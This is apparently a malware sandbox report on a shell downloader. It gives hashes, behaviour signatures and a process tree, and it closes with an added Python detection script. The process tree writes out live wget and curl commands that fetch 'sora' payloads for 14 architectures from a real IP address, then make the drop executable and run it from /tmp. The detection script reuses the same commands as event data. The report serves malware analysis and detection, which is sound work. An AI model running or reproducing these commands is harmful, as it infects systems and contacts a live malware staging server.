Analysis

max time kernel: 14s
max time network: 15s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 02:43
Static task
static1

Behavioral tasks (all four run the same sample, c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh)
behavioral1  ubuntu1804-amd64-20240611-en
behavioral2  debian9-armhf-20240611-en (the run reported on this page)
behavioral3  debian9-mipsbe-20240611-en
behavioral4  debian9-mipsel-20240729-en
General

Target: c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Size: 2KB
MD5: ee0d49be644dae49f775256609f1218e
SHA1: 036f36cd4a7dc0abe7ea6315e9f2524f35a6c73d
SHA256: c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2
SHA512: 1df66cf2794390f84d3c0e20e24991c720c852c38a3b1984e8c120d1310f492ffad43ae4248e72cbd00968ec4a3db753f4a748147ac2295ad7a83f46146374c8
Malware Config
Signatures
File and Directory Permissions Modification  1 TTPs  14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
  Process  pid
  chmod    672, 686, 693, 699, 711, 724, 739, 751, 774, 784, 816, 822, 829, 835

Executes dropped EXE  14 IoCs
  ioc          Process  pid
  /tmp/robben  robben   673, 687, 694, 700, 712, 726, 740, 752, 775, 785, 817, 823, 830, 836
Checks CPU configuration  1 TTPs  14 IoCs
Checks CPU information that can indicate whether the system is a virtual machine.
  description              ioc            Process
  File opened for reading  /proc/cpuinfo  curl  (14 occurrences)

Reads runtime system information  28 IoCs
  description              ioc                            Process
  File opened for reading  /proc/self/auxv                curl  (14 occurrences)
  File opened for reading  /proc/sys/crypto/fips_enabled  curl  (14 occurrences)

Caveat: every one of these reads is attributed to curl, not to the dropped robben binary. One hit per curl invocation, each touching /proc/cpuinfo, /proc/self/auxv and /proc/sys/crypto/fips_enabled, is consistent with a TLS-enabled curl's cryptographic libraries probing CPU features and the kernel FIPS flag at start-up. Treat these two signatures as weak evidence of sandbox evasion for this sample; the behaviour that matters here is the download-and-execute chain in the process tree below.
System Network Configuration Discovery  1 TTPs  3 IoCs
Adversaries may gather information about the network configuration of a system.
  pid  Process
  676  wget
  680  curl
  685  cat
Writes file to tmp directory  1 IoCs
Malware often drops required files in the /tmp directory.
  description                   ioc          Process
  File opened for modification  /tmp/robben  c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
Processes

The sample is a shell downloader. For each of 14 architecture-specific payloads it fetches http://93.123.85.141/bins/sora.<arch> with wget and again with curl -O, runs cat on the download (the shell's redirection is not visible in the argument list; the report attributes the write of /tmp/robben to the script itself), marks the sample, the dropped robben and an unrelated systemd-private directory executable with chmod +x (an argument list consistent with a wildcard over /tmp), and then executes /tmp/robben with the argument goahead.exploit. Every child below hangs directly off the script (PID 649); the children are listed in the order recorded, one five-step iteration per architecture.

PID 649  /tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh  /tmp/c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh
         - Writes file to tmp directory

  sora.x86
  PID 651  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86
  PID 660  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86
           - Checks CPU configuration
           - Reads runtime system information
  PID 670  /bin/cat       cat sora.x86
  PID 672  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 673  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.mips
  PID 676  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mips
           - System Network Configuration Discovery
  PID 680  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mips
           - Checks CPU configuration
           - Reads runtime system information
           - System Network Configuration Discovery
  PID 685  /bin/cat       cat sora.mips
           - System Network Configuration Discovery
  PID 686  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 687  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.x86_64
  PID 689  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86_64
  PID 691  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86_64
           - Checks CPU configuration
           - Reads runtime system information
  PID 692  /bin/cat       cat sora.x86_64
  PID 693  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 694  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.i468
  PID 696  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i468
  PID 697  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i468
           - Checks CPU configuration
           - Reads runtime system information
  PID 698  /bin/cat       cat sora.i468
  PID 699  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 700  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.i686
  PID 702  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i686
  PID 706  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i686
           - Checks CPU configuration
           - Reads runtime system information
  PID 710  /bin/cat       cat sora.i686
  PID 711  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 712  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.mpsl
  PID 715  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mpsl
  PID 719  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mpsl
           - Checks CPU configuration
           - Reads runtime system information
  PID 723  /bin/cat       cat sora.mpsl
  PID 724  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 726  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.arm4
  PID 728  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm4
  PID 732  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm4
           - Checks CPU configuration
           - Reads runtime system information
  PID 737  /bin/cat       cat sora.arm4
  PID 739  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 740  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.arm5
  PID 743  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm5
  PID 746  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm5
           - Checks CPU configuration
           - Reads runtime system information
  PID 750  /bin/cat       cat sora.arm5
  PID 751  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 752  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.arm6
  PID 755  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm6
  PID 772  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm6
           - Checks CPU configuration
           - Reads runtime system information
  PID 773  /bin/cat       cat sora.arm6
  PID 774  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 775  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.arm7
  PID 777  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm7
  PID 778  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm7
           - Checks CPU configuration
           - Reads runtime system information
  PID 782  /bin/cat       cat sora.arm7
  PID 784  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 785  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.ppc
  PID 787  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc
  PID 791  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc
           - Checks CPU configuration
           - Reads runtime system information
  PID 815  /bin/cat       cat sora.ppc
  PID 816  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 817  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.ppc440fp
  PID 819  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc440fp
  PID 820  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc440fp
           - Checks CPU configuration
           - Reads runtime system information
  PID 821  /bin/cat       cat sora.ppc440fp
  PID 822  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 823  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.m68k
  PID 826  /usr/bin/wget  wget http://93.123.85.141/bins/sora.m68k
  PID 827  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.m68k
           - Checks CPU configuration
           - Reads runtime system information
  PID 828  /bin/cat       cat sora.m68k
  PID 829  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 830  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE

  sora.sh4
  PID 832  /usr/bin/wget  wget http://93.123.85.141/bins/sora.sh4
  PID 833  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.sh4
           - Checks CPU configuration
           - Reads runtime system information
  PID 834  /bin/cat       cat sora.sh4
  PID 835  /bin/chmod     chmod +x c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-pjE5rl
           - File and Directory Permissions Modification
  PID 836  /tmp/robben    ./robben goahead.exploit
           - Executes dropped EXE
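Detection logic for the chain the tree above records (download with wget/curl, chmod +x, execute from /tmp), as an added example. It is not part of the sandbox report and not code from the sample. The EVENTS list is transcribed from the process tree (pid, parent pid, image, command line) for the script and its first two iterations; the parent pid 649 is inferred from the tree depth, since every command hangs directly off the shell script. The four-field event layout, the world-writable directory list and the function names are this example's own assumptions, not a Triage export format.

```python
"""Flag the download -> chmod +x -> execute-from-/tmp chain recorded above.

Added example; not part of the sandbox report and not code from the sample.
EVENTS is transcribed from the process tree (pid, ppid, image, cmdline); the
ppid 649 is inferred from the tree depth. The event layout and the function
names are this example's own assumptions, not a Triage export format.
"""
import json
import re
from collections import defaultdict

SAMPLE = "c92a036e201b56b48bd3a80992226e8be9a0add173d968e3d0e9542fdbda10f2.sh"
SYSTEMD_DIR = ("systemd-private-aaea58b58de5438c837e984796459c2c"
               "-systemd-timedated.service-pjE5rl")

# (pid, ppid, image, cmdline): the script plus its first two iterations
# (x86, mips) from the report; the other twelve repeat the same five steps.
EVENTS = [
    (649, 1,   "/tmp/" + SAMPLE, "/tmp/" + SAMPLE),
    (651, 649, "/usr/bin/wget", "wget http://93.123.85.141/bins/sora.x86"),
    (660, 649, "/usr/bin/curl", "curl -O http://93.123.85.141/bins/sora.x86"),
    (670, 649, "/bin/cat",      "cat sora.x86"),
    (672, 649, "/bin/chmod",    f"chmod +x {SAMPLE} robben {SYSTEMD_DIR}"),
    (673, 649, "/tmp/robben",   "./robben goahead.exploit"),
    (676, 649, "/usr/bin/wget", "wget http://93.123.85.141/bins/sora.mips"),
    (680, 649, "/usr/bin/curl", "curl -O http://93.123.85.141/bins/sora.mips"),
    (685, 649, "/bin/cat",      "cat sora.mips"),
    (686, 649, "/bin/chmod",    f"chmod +x {SAMPLE} robben {SYSTEMD_DIR}"),
    (687, 649, "/tmp/robben",   "./robben goahead.exploit"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
DOWNLOADERS = {"wget", "curl"}                        # extend for tftp/ftpget droppers
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed list of drop directories


def extract_urls(events):
    """Every URL found on a command line, de-duplicated and sorted."""
    urls = set()
    for _, _, _, cmd in events:
        urls.update(URL_RE.findall(cmd))
    return sorted(urls)


def download_hosts(events):
    """Distinct hosts contacted by download commands (the staging server)."""
    return sorted({u.split("/")[2] for u in extract_urls(events)})


def chmod_exec_targets(cmd):
    """Names made executable by a 'chmod +x ...' command line; empty otherwise."""
    argv = cmd.split()
    if not argv or argv[0] != "chmod" or "+x" not in argv[1:]:
        return set()
    return {a for a in argv[1:] if not a.startswith(("-", "+"))}


def find_drop_and_exec_chains(events):
    """Per parent, report each child executed from a world-writable directory
    after a download command and a chmod +x naming that file. Children are
    walked in pid order (the order the sandbox recorded them). The downloaded
    name and the executed name are deliberately not required to match: the
    rename (here a shell redirection around cat) never appears in argv."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev[1]].append(ev)
    chains = []
    for ppid, children in by_parent.items():
        downloaded = []      # payload names fetched so far, first-seen order
        made_exec = set()
        for pid, _, image, cmd in sorted(children):
            argv = cmd.split()
            if argv and argv[0] in DOWNLOADERS:
                for url in URL_RE.findall(cmd):
                    name = url.rsplit("/", 1)[-1]
                    if name not in downloaded:
                        downloaded.append(name)
            made_exec |= chmod_exec_targets(cmd)
            if image.startswith(WORLD_WRITABLE):
                if image.rsplit("/", 1)[-1] in made_exec and downloaded:
                    chains.append({"ppid": ppid, "pid": pid, "executed": image,
                                   "args": argv[1:],
                                   "downloaded_before": list(downloaded)})
    return chains


def summarize(events):
    """IOC summary a responder would lift from the tree."""
    urls = extract_urls(events)
    return {
        "hosts": download_hosts(events),
        "payload_names": sorted({u.rsplit("/", 1)[-1] for u in urls}),
        "dropped_and_executed": find_drop_and_exec_chains(events),
    }


if __name__ == "__main__":
    print(json.dumps(summarize(EVENTS), indent=2))
```

On a live host the same four fields come from auditd execve records or an eBPF exec tracer, where the parent pid is recorded directly rather than inferred. The check keys on "made executable, then executed from a drop directory in the same parent" instead of on file names because the only step that produces /tmp/robben, the shell's redirection of cat, is invisible in process arguments; it is also the step a noexec mount on /tmp would have stopped.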
Network
MITRE ATT&CK Enterprise v15

Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1)
    System Checks (1)